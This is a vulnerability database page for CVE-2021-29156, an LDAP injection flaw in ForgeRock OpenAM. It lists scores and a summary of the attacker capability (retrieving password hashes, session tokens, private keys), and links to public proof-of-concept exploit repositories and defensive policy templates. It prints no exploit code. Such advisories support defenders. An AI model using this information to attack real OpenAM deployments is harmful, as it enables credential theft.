Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.5
CVSSv3

CVE-2021-29156

Published: 25/03/2021 Updated: 29/03/2021
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 446
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Subscribe to Forgerock

Vulnerability Summary

ForgeRock OpenAM prior to 13.5.1 allows LDAP injection via the Webfinger protocol. For example, an unauthenticated attacker can perform character-by-character retrieval of password hashes, or retrieve a session token or a private key.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

forgerock openam

Github Repositories

https://github.com/guidepointsecurity/CVE-2021-29156

Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v13.0.0.

CVE-2021-29156 Proof-of-Concept (c) 2021 GuidePoint Security Charlton Trezevant charltontrezevant@guidepointsecuritycom Background Today GuidePoint is pleased to release a functional Proof-of-Concept tool for CVE-2021-29156, an LDAP injection vulnerability in ForgeRock OpenAM v1300 This vulnerability allows an attacker to extract a variety of information (such as a user&rs

https://github.com/5amu/CVE-2021-29156

Exploit for CVE-2021-29156

CVE-2021-29156 done right This Proof of Concept is realized because the other PoC publicly available is broken ✨ Install go install githubcom/5amu/CVE-2021-29156@latest References nvdnistgov/vuln/detail/CVE-2021-29156 portswiggernet/research/hidden-oauth-attack-vectors githubcom/OpenIdentityPlatform/OpenAM/

https://github.com/afzalbin64/accuknox-policy-temp

accuknox-policy-temp A community-owned library of Kubernetes System and Network policies AccuKnox Templates overview Please follow the hierarchy while contribution ├── cves │ ├── network │ │ └── cnp-CVE-2009-0932yaml │ ├── system │ │ └── ksp-CVE-2021-29156yaml │ │ └── ksp-CVE-2021-29442yaml ├──

https://github.com/kubearmor/policy-templates

Community curated list of System and Network policy templates for the KubeArmor and Cilium

Policies Libraries A community-owned library of Kubernetes System and Network policies Policy Templates overview Please follow the hierarchy while contribution ├── mitre │ ├── network │ │ └── cnp-firewall-world-blockyaml │ ├── system │ │ └── ksp-postgres-allowyaml │ │ └── ksp-privilage-pod-blockyaml â

References

CWE-74https://bugster.forgerock.org/jira/browse/OPENAM-10135https://portswigger.net/research/hidden-oauth-attack-vectorshttps://nvd.nist.govhttps://github.com/guidepointsecurity/CVE-2021-29156
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4761command injectionCVE-2024-3676IDORCVE-2024-30039CVE-2024-32113CVE-2024-30049CVE-2024-4776SQL injection
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook